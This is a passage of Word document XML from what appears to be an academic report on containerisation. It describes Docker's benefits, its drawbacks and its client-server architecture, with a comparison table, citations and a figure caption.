            <w:pPr>
              <w:tabs>
                <w:tab w:val="center" w:pos="1395"/>
              </w:tabs>
            </w:pPr>
            <w:r>
              <w:t>Slower</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC57E9" w14:paraId="6ED2EF07" w14:textId="77777777" w:rsidTr="00BC57E9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="31FB0298" w14:textId="6182B89E" w:rsidR="00BC57E9" w:rsidRDefault="00C121FC" w:rsidP="00BC57E9">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Mobility</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3685" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="059F40C3" w14:textId="724270FF" w:rsidR="00BC57E9" w:rsidRDefault="00C121FC" w:rsidP="00BC57E9">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Fast and easy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3544" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="49842D84" w14:textId="198FB02F" w:rsidR="00BC57E9" w:rsidRDefault="00101E3B" w:rsidP="00BC57E9">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="center" w:pos="1395"/>
              </w:tabs>
            </w:pPr>
            <w:r>
              <w:t>S</w:t>
            </w:r>
            <w:r w:rsidR="00C121FC">
              <w:t>lower</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C121FC" w14:paraId="0FB0FB8F" w14:textId="77777777" w:rsidTr="00BC57E9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69565178" w14:textId="6CD1E95C" w:rsidR="00C121FC" w:rsidRDefault="00C121FC" w:rsidP="00BC57E9">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>OS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3685" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F805D7C" w14:textId="7AFE9B21" w:rsidR="00C121FC" w:rsidRDefault="00C121FC" w:rsidP="00BC57E9">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Supports single OS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3544" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A8F1F4F" w14:textId="0B394910" w:rsidR="00C121FC" w:rsidRDefault="00C121FC" w:rsidP="00BC57E9">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="center" w:pos="1395"/>
              </w:tabs>
            </w:pPr>
            <w:r>
              <w:t>Supports multiple OS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2B6548E9" w14:textId="681987AF" w:rsidR="00F36AB4" w:rsidRDefault="00B06579" w:rsidP="00F36AB4">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D58B34" w14:textId="68FBFB6A" w:rsidR="004A0407" w:rsidRDefault="00A1477F" w:rsidP="004A0407">
      <w:r>
        <w:t>Containerisation has become more common in the cloud industry and replac</w:t>
      </w:r>
      <w:r w:rsidR="006111C6">
        <w:t>es</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the traditional virtualisation method due to its portability, </w:t>
      </w:r>
      <w:r w:rsidR="00AF71E0">
        <w:t>flexibility</w:t>
      </w:r>
      <w:r w:rsidR="00F82977">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00AF71E0">
        <w:t xml:space="preserve"> and cost-effective</w:t>
      </w:r>
      <w:r w:rsidR="006111C6">
        <w:t>ness</w:t>
      </w:r>
      <w:r w:rsidR="00AF71E0">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00F82977">
        <w:t xml:space="preserve"> There are many </w:t>
      </w:r>
      <w:r w:rsidR="00F82977">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">container formats, such as Docker, Linux Containers (LXC), and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F82977">
        <w:t>rkt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F82977">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00471080">
        <w:t xml:space="preserve"> However,</w:t>
      </w:r>
      <w:r w:rsidR="00F82977">
        <w:t xml:space="preserve"> Docker is an open source and most </w:t>
      </w:r>
      <w:r w:rsidR="002A6F05">
        <w:t xml:space="preserve">popular </w:t>
      </w:r>
      <w:r w:rsidR="00F82977">
        <w:t>tool in the containerisation industry</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="795491614"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="002A6F05">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="002A6F05">
            <w:instrText xml:space="preserve"> CITATION XXi17 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="002A6F05">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[13]</w:t>
          </w:r>
          <w:r w:rsidR="002A6F05">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00F82977">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037AC50F" w14:textId="4A653D7A" w:rsidR="00B669F0" w:rsidRDefault="0099358C" w:rsidP="00900794">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="39" w:name="_Toc87032890"/>
      <w:r>
        <w:t>DOCKER</w:t>
      </w:r>
      <w:bookmarkEnd w:id="39"/>
    </w:p>
    <w:p w14:paraId="23E00A19" w14:textId="121FDE10" w:rsidR="00B933F3" w:rsidRDefault="008F4114" w:rsidP="00BF55AB">
      <w:r>
        <w:t xml:space="preserve">Docker is a public containerisation </w:t>
      </w:r>
      <w:r w:rsidR="00EA68B3">
        <w:t>platform developed based on Linux features that allow deploy</w:t>
      </w:r>
      <w:r w:rsidR="0012322C">
        <w:t>ing</w:t>
      </w:r>
      <w:r w:rsidR="00EA68B3">
        <w:t>, creat</w:t>
      </w:r>
      <w:r w:rsidR="0012322C">
        <w:t>ing</w:t>
      </w:r>
      <w:r w:rsidR="00EA68B3">
        <w:t>, and run</w:t>
      </w:r>
      <w:r w:rsidR="0012322C">
        <w:t>ning</w:t>
      </w:r>
      <w:r w:rsidR="00EA68B3">
        <w:t xml:space="preserve"> applic</w:t>
      </w:r>
      <w:r w:rsidR="004F5D97">
        <w:t>ations.</w:t>
      </w:r>
      <w:r w:rsidR="002B5017">
        <w:t xml:space="preserve"> Docker </w:t>
      </w:r>
      <w:r w:rsidR="007A5657">
        <w:t>enables to containerise and run application dependencies in a</w:t>
      </w:r>
      <w:r w:rsidR="006111C6">
        <w:t>n entirely</w:t>
      </w:r>
      <w:r w:rsidR="007A5657">
        <w:t xml:space="preserve"> secluded atmosphere </w:t>
      </w:r>
      <w:r w:rsidR="006B3C8D">
        <w:t xml:space="preserve">known as </w:t>
      </w:r>
      <w:r w:rsidR="00471080">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="006B3C8D">
        <w:t>container.</w:t>
      </w:r>
      <w:r w:rsidR="00D72DC4">
        <w:t xml:space="preserve"> It uses Linux features, such as namespaces and Cgroups to provide isolation and security, supporting </w:t>
      </w:r>
      <w:r w:rsidR="00BF55AB">
        <w:t>multiple</w:t>
      </w:r>
      <w:r w:rsidR="00D72DC4">
        <w:t xml:space="preserve"> containers to run simultaneously on a single host.</w:t>
      </w:r>
      <w:r w:rsidR="00BF55AB">
        <w:t xml:space="preserve"> Simply put, it is an extension of LXC technology with more advanced features and capabilities</w:t>
      </w:r>
      <w:r w:rsidR="004A58E8">
        <w:t xml:space="preserve">. For instance, Docker uses improved API </w:t>
      </w:r>
      <w:r w:rsidR="00E7438C">
        <w:t>to produce enhanced virtualisation outcome</w:t>
      </w:r>
      <w:r w:rsidR="006111C6">
        <w:t>s,</w:t>
      </w:r>
      <w:r w:rsidR="00701359">
        <w:t xml:space="preserve"> enabling each application to run isolated </w:t>
      </w:r>
      <w:r w:rsidR="005E2773">
        <w:t>on top of the host’s OS.</w:t>
      </w:r>
      <w:r w:rsidR="00D17A38">
        <w:t xml:space="preserve"> Further, Docker containers are </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="001D6F19">
        <w:t>small in size</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="001D6F19">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="00D17A38">
        <w:t xml:space="preserve">contain </w:t>
      </w:r>
      <w:r w:rsidR="001D6F19">
        <w:t>all</w:t>
      </w:r>
      <w:r w:rsidR="00D17A38">
        <w:t xml:space="preserve"> the necessary </w:t>
      </w:r>
      <w:r w:rsidR="001D6F19">
        <w:t xml:space="preserve">packages to run an application. As a result, </w:t>
      </w:r>
      <w:r w:rsidR="006111C6">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="001D6F19">
        <w:t>Docker platform provides portability and simplicity to share containers across the cloud</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="1283005181"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="003F2FE0">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="003F2FE0">
            <w:instrText xml:space="preserve"> CITATION BRa17 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00844F04">
            <w:instrText xml:space="preserve"> \m AMP20</w:instrText>
          </w:r>
          <w:r w:rsidR="00757532">
            <w:instrText xml:space="preserve"> \m doc21</w:instrText>
          </w:r>
          <w:r w:rsidR="003F2FE0">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[14, 15, 16]</w:t>
          </w:r>
          <w:r w:rsidR="003F2FE0">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="001D6F19">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72BC0F9C" w14:textId="2A6EA87A" w:rsidR="00844F04" w:rsidRDefault="00757532" w:rsidP="00BF55AB">
      <w:r>
        <w:t>Docker has become the de</w:t>
      </w:r>
      <w:r w:rsidR="006111C6">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>facto platform in the production environment to create and deploy containerised applications because of its many benefits</w:t>
      </w:r>
      <w:r w:rsidR="00D34A08">
        <w:t xml:space="preserve">. One of the main advantages of using Docker is speed. With Docker, it is </w:t>
      </w:r>
      <w:r w:rsidR="006111C6">
        <w:t>super-fast</w:t>
      </w:r>
      <w:r w:rsidR="00D34A08">
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidR="00DB4503">
        <w:t>build</w:t>
      </w:r>
      <w:r w:rsidR="00D34A08">
        <w:t xml:space="preserve"> a container because they are lightweight, and thus </w:t>
      </w:r>
      <w:r w:rsidR="00DB4503">
        <w:t>testing, deploying</w:t>
      </w:r>
      <w:r w:rsidR="006111C6">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00DB4503">
        <w:t xml:space="preserve"> and development processes of an application can be achieved faster. In addition, </w:t>
      </w:r>
      <w:r w:rsidR="00E54366">
        <w:t xml:space="preserve">Docker </w:t>
      </w:r>
      <w:r w:rsidR="000767F3">
        <w:t>containers</w:t>
      </w:r>
      <w:r w:rsidR="006111C6">
        <w:t>’ applications</w:t>
      </w:r>
      <w:r w:rsidR="00E54366">
        <w:t xml:space="preserve"> are highly portable</w:t>
      </w:r>
      <w:r w:rsidR="000767F3">
        <w:t xml:space="preserve"> and easy to manage workloads across </w:t>
      </w:r>
      <w:r w:rsidR="00F45B95">
        <w:t>various environments</w:t>
      </w:r>
      <w:r w:rsidR="000767F3">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="007E3370">
        <w:t xml:space="preserve"> With Docker, it is also easy to scale up or adjust services according to the business needs, close to real</w:t>
      </w:r>
      <w:r w:rsidR="00FF5DE1">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="007E3370">
        <w:t>time. Further, Docker provides consistent and continuous application integration and delivery workflow</w:t>
      </w:r>
      <w:r w:rsidR="00851D04">
        <w:t xml:space="preserve"> (CI/CD)</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="41410435"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="009C5833">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="009C5833">
            <w:instrText xml:space="preserve"> CITATION VTu15 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00706DF2">
            <w:instrText xml:space="preserve"> \m VSh20 \m ONa20</w:instrText>
          </w:r>
          <w:r w:rsidR="009C5833">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[17, 18, 19]</w:t>
          </w:r>
          <w:r w:rsidR="009C5833">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="007E3370">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E32CBF0" w14:textId="7C5FEA47" w:rsidR="00C81801" w:rsidRDefault="00CB1CB6" w:rsidP="00534B95">
      <w:r>
        <w:t>However, Docker has also some drawbacks, particularly with its security and isolation.</w:t>
      </w:r>
      <w:r w:rsidR="005455AC">
        <w:t xml:space="preserve"> Further, Docker does not </w:t>
      </w:r>
      <w:r w:rsidR="00746FBC">
        <w:t>provide compatibility and flexibility with older</w:t>
      </w:r>
      <w:r w:rsidR="005455AC">
        <w:t xml:space="preserve"> machines</w:t>
      </w:r>
      <w:r w:rsidR="00746FBC">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="005455AC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00746FBC">
        <w:t>such as</w:t>
      </w:r>
      <w:r w:rsidR="005455AC">
        <w:t xml:space="preserve"> 32-bit OS</w:t>
      </w:r>
      <w:r w:rsidR="00FF5DE1">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00746FBC">
        <w:t xml:space="preserve"> as it is designed </w:t>
      </w:r>
      <w:r w:rsidR="0012322C">
        <w:t>only</w:t>
      </w:r>
      <w:r w:rsidR="00291F9A">
        <w:t xml:space="preserve"> to</w:t>
      </w:r>
      <w:r w:rsidR="0012322C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00746FBC">
        <w:t>support 64-bit and new machines</w:t>
      </w:r>
      <w:r w:rsidR="005455AC">
        <w:t>. Also,</w:t>
      </w:r>
      <w:r w:rsidR="00EC7FDC">
        <w:t xml:space="preserve"> with Docker, complete virtualisation cannot be achieved because </w:t>
      </w:r>
      <w:r w:rsidR="00D3053A">
        <w:t xml:space="preserve">Docker relies on </w:t>
      </w:r>
      <w:r w:rsidR="00FF5DE1">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00D3053A">
        <w:t>Linux kernel</w:t>
      </w:r>
      <w:r w:rsidR="00746FBC">
        <w:t xml:space="preserve"> of the host machine. In addition, Docker is platform dependent </w:t>
      </w:r>
      <w:r w:rsidR="003F7C7D">
        <w:t>and hence requires more additional layers between the Docker engine and the host OS</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-1227375584"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="003F7C7D">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="003F7C7D">
            <w:instrText xml:space="preserve"> CITATION Sit21 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="009C5833">
            <w:instrText xml:space="preserve"> \m ASH13</w:instrText>
          </w:r>
          <w:r w:rsidR="003F7C7D">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[20, 21]</w:t>
          </w:r>
          <w:r w:rsidR="003F7C7D">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="003F7C7D">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792B18B3" w14:textId="2D471F92" w:rsidR="00534B95" w:rsidRPr="00534B95" w:rsidRDefault="0099358C" w:rsidP="00900794">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="40" w:name="_Toc87032891"/>
      <w:r>
        <w:t>DOCKER ARCHITECTURE AND COMPONENTS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="40"/>
    </w:p>
    <w:p w14:paraId="44645F5F" w14:textId="7498956A" w:rsidR="00844F04" w:rsidRDefault="00174E4B" w:rsidP="00534B95">
      <w:r>
        <w:t xml:space="preserve">The Docker platform </w:t>
      </w:r>
      <w:r w:rsidR="009F1627">
        <w:t>consists of</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> various components, including </w:t>
      </w:r>
      <w:r w:rsidR="009F1627">
        <w:t>Docker containers, Docker images, Docker registries, Docker client, and Docker server. The following sections ex</w:t>
      </w:r>
      <w:r w:rsidR="00C21DA0">
        <w:t>plain in detail these components.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081FE4B4" w14:textId="5CD083D4" w:rsidR="004A0407" w:rsidRDefault="004A0407" w:rsidP="004A0407">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="41" w:name="_Toc87032892"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Docker </w:t>
      </w:r>
      <w:r w:rsidR="00AD273F">
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t>rchitecture</w:t>
      </w:r>
      <w:bookmarkEnd w:id="41"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AEDAFFD" w14:textId="0F27AA66" w:rsidR="00D61D5E" w:rsidRDefault="00155052" w:rsidP="00D61D5E">
      <w:r>
        <w:t xml:space="preserve">The Docker system operates in a client-server fashion to build and containerise applications. Its architecture contains several elements, </w:t>
      </w:r>
      <w:r w:rsidR="003040D7">
        <w:t>containing Docker client, Docker daemon, and Docker registry.</w:t>
      </w:r>
      <w:r w:rsidR="00425F6D">
        <w:t xml:space="preserve"> The Docker daemon </w:t>
      </w:r>
      <w:r w:rsidR="00FF5DE1">
        <w:t xml:space="preserve">is </w:t>
      </w:r>
      <w:r w:rsidR="00425F6D">
        <w:t>also known as Docker engine</w:t>
      </w:r>
      <w:r w:rsidR="00FF5DE1">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00425F6D">
        <w:t xml:space="preserve"> is the cornerstone of the Docker system.</w:t>
      </w:r>
      <w:r w:rsidR="00C92F69">
        <w:t xml:space="preserve"> It is a persistent background process that manages Docker objects, such as Docker images, containers, networks, and volumes</w:t>
      </w:r>
      <w:r w:rsidR="00FF5DE1">
        <w:t>, and</w:t>
      </w:r>
      <w:r w:rsidR="005E5E5B">
        <w:t xml:space="preserve"> contains three main components: Server, Rest API, and the Command Line Interface (CLI).</w:t>
      </w:r>
      <w:r w:rsidR="00833AC5">
        <w:t xml:space="preserve"> It uses </w:t>
      </w:r>
      <w:r w:rsidR="005E5E5B">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00833AC5">
        <w:t xml:space="preserve">REST API to </w:t>
      </w:r>
      <w:r w:rsidR="00F92984">
        <w:t xml:space="preserve">processes </w:t>
      </w:r>
      <w:r w:rsidR="007D0A63">
        <w:t>client request</w:t>
      </w:r>
      <w:r w:rsidR="00FF5DE1">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="007D0A63">
        <w:t xml:space="preserve"> and instruct</w:t>
      </w:r>
      <w:r w:rsidR="00FF5DE1">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="007D0A63">
        <w:t xml:space="preserve"> the Docker daemon, acting as a client-server application.</w:t>
      </w:r>
      <w:r w:rsidR="005E5E5B">
        <w:t xml:space="preserve"> The Docker client enables users to interact and communicate with the Docker engine through API socke</w:t>
      </w:r>
      <w:r w:rsidR="00FF5DE1">
        <w:t>ts</w:t>
      </w:r>
      <w:r w:rsidR="005E5E5B">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00AD273F">
        <w:t xml:space="preserve"> The Docker daemon also forwards requests to pull or push images to the Docker registry, a location where Docker images are stored</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-35981741"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="005461B2">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="005461B2">
            <w:instrText xml:space="preserve"> CITATION Sin16 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00E172EF">
            <w:instrText xml:space="preserve"> \m FŠp15</w:instrText>
          </w:r>
          <w:r w:rsidR="005461B2">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[22, 23]</w:t>
          </w:r>
          <w:r w:rsidR="005461B2">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00AD273F">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="001D24EA">
        <w:t xml:space="preserve"> Figure 3 illustrates the client-server architecture of Docker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1694CB" w14:textId="03F65669" w:rsidR="00E172EF" w:rsidRPr="00D61D5E" w:rsidRDefault="00E172EF" w:rsidP="00E172EF">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E2A7487" wp14:editId="1716D351">
            <wp:extent cx="5229860" cy="274955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29860" cy="2749550"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="788078C9" w14:textId="66C9C9A3" w:rsidR="00844F04" w:rsidRDefault="00E172EF" w:rsidP="00683081">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="42" w:name="_Toc86858594"/>
      <w:bookmarkStart w:id="43" w:name="_Toc86867484"/>
      <w:r w:rsidRPr="00683081">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00683081">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00683081">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00683081">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00683081">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00683081">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: Docker architecture</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:b/>
            <w:bCs/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:color w:val="000000" w:themeColor="text1"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:id w:val="-963029729"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidRPr="00683081">
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:i w:val="0"/>
              <w:iCs w:val="0"/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="00683081">
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:i w:val="0"/>
              <w:iCs w:val="0"/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> CITATION doc211 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidRPr="00683081">
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:i w:val="0"/>
              <w:iCs w:val="0"/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:i w:val="0"/>
              <w:iCs w:val="0"/>
              <w:noProof/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t>[24]</w:t>
          </w:r>
          <w:r w:rsidRPr="00683081">
            <w:rPr>
